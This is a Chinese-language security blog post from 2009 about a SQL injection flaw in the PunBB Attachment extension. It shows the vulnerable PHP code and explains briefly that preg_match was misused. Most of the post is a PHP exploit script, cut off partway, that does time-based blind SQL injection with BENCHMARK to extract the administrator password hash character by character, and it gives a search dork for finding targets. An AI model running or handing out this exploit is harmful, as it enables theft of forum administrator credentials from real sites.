2009-10
29
文/Ryat
漏洞代码:
if (isset($_GET['secure_str'])) { if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match)) { ... 'WHERE' => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1) AND secure_str = \''.$_GET['secure_str'].'\'' |
应该是对正则表达式及preg_match函数的误用,导致可以通过$_GET['secure_str']来触发sql inj…
另外,在pun_list_attach.php文件还有个注射,不过需要后台权限,有兴趣的同学自己看,那个要更明显些:)
EXP:
#!/usr/bin/php < ?php print_r(' +---------------------------------------------------------------------------+ Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by PunBB" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to punbb Example: php '.$argv[0].' localhost /punbb/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $pre = 'pun_'; $benchmark = 200000000; $timeout = 10; echo "Plz Waiting...\nPassword:\n"; /** * get pass */ $j = 1; $pass = ''; $hash[0] = 0; //null $hash = array_merge($hash, range(48, 57)); //numbers $hash = array_merge($hash, range(97, 122)); //a-z letters while (strlen($pass) < 40) { for ($i = 0; $i <= 255; $i ++) { if (in_array($i, $hash)) { $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23'; send(); usleep(2000000); $starttime = time(); |
还没有任何评论。